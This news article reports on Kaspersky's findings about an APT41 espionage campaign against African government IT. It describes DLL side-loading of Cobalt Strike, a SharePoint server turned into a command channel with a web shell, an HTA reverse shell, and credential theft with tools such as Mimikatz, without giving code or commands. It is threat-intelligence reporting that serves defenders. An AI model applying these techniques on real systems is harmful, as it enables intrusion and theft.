New Cyber Espionage Campaign Targets African IT Infrastructure
A recently unearthed cyber espionage operation linked to the Chinese group known as APT41 has turned its attention toward government IT services in Africa. Researchers from Kaspersky, a global cybersecurity firm, reported finding distinct markers indicating this campaign, highlighting a shift in focus towards a region that has seen relatively little activity from this particular threat actor.
APT41: A Prolific Cyber Threat
APT41, recognized for its extensive hacking activities, has historically targeted a diverse range of industries, including telecommunications, energy, education, and healthcare across more than thirty countries. This latest campaign underscores a concerning expansion into African markets, as noted by experts who point out that Africa had previously experienced minimal intrusions from this group. Trend Micro had earlier observed a similar uptick in targeting the continent since late 2022, further emphasizing the growing significance of this threat.
Initial Investigation and Malicious Activities
The investigation by Kaspersky was triggered by unusual activities detected on multiple workstations tied to an unnamed organization’s IT systems. These activities included attempts to determine the availability of a command-and-control (C2) server, which was discovered to involve an unmonitored host that had been compromised. The attackers exploited the compromised system by executing commands through a series of tools designed for lateral movement within the network.
During this intrusion, attackers managed to gather credentials linked to privileged accounts to elevate their access rights and subsequently deployed Cobalt Strike—a well-known penetration testing tool used for command and control operations—by embedding it within a DLL through a process called side-loading.
Sophisticated Malware Techniques
This cyber campaign has also introduced malicious DLLs that perform checks on the installed language packs of the infected host, only allowing execution if certain specific language packs—such as Japanese, Korean, and others—are absent. This indicates a clear strategy aimed at evasion and stealth.
Interestingly, one of the defining characteristics of this operation is the use of a compromised SharePoint server as a C2 channel. Commands sent from this server are executed by a C#-based trojan that was uploaded to the victim’s machines, demonstrating a blend of traditional malware deployment methods with more nuanced tactics aimed at leveraging trusted services for covert communication.
Advanced Command Execution and Payload Delivery
To facilitate command execution, attackers distributed files named “agents.exe” and “agentx.exe” via the SMB protocol, enabling communication with the compromised SharePoint server. The trojan’s primary function involves executing commands received from a web shell named CommandHandler.aspx, installed on the SharePoint server. This highlights the tactical ingenuity employed by the attackers to maintain a low profile while conducting their operations.
Malicious Payloads and Data Exfiltration
Once foothold was established, follow-up activities were observed, including the execution of cmd.exe commands designed to pull a malicious HTML application (HTA) file from an external source. This file, which masqueraded under a domain resembling GitHub, contained embedded JavaScript designed to create a reverse shell for the attackers. Notably, the exact nature of this payload remains unclear, but its primary function is to allow the attackers unfettered access to the target system for future manipulation.
Credential Harvesting and Information Theft
In their operations, the attackers employed various utilities designed to siphon sensitive data, exfiltrating information through the compromised SharePoint server. Notably, these included:
- Pillager: A modified credential stealer that extracts data from browsers, databases, and administrative tools.
- Checkout: A tool specifically targeting saved credit card information and downloaded file details across numerous web browsers.
- RawCopy: Utility for copying raw registry files.
- Mimikatz: A well-known tool for dumping account credentials.
The Threat Landscape
Kaspersky’s analysis emphasizes that APT41 is adept at utilizing both custom-built and publicly available tools, specifically employing sophisticated frameworks like Cobalt Strike throughout various attack stages. The attackers demonstrate agility, readily adapting their techniques to fit the targeted infrastructure, which complicates detection and mitigation efforts.
This campaign highlights the challenges faced by organizations attempting to thwart cyber espionage efforts, particularly as the line blurs between traditional penetration testing tools and malicious cyber operations. As APT41 advances its tactics and tools, the need for robust detection and response mechanisms becomes increasingly critical in the ongoing battle against cyber threats.
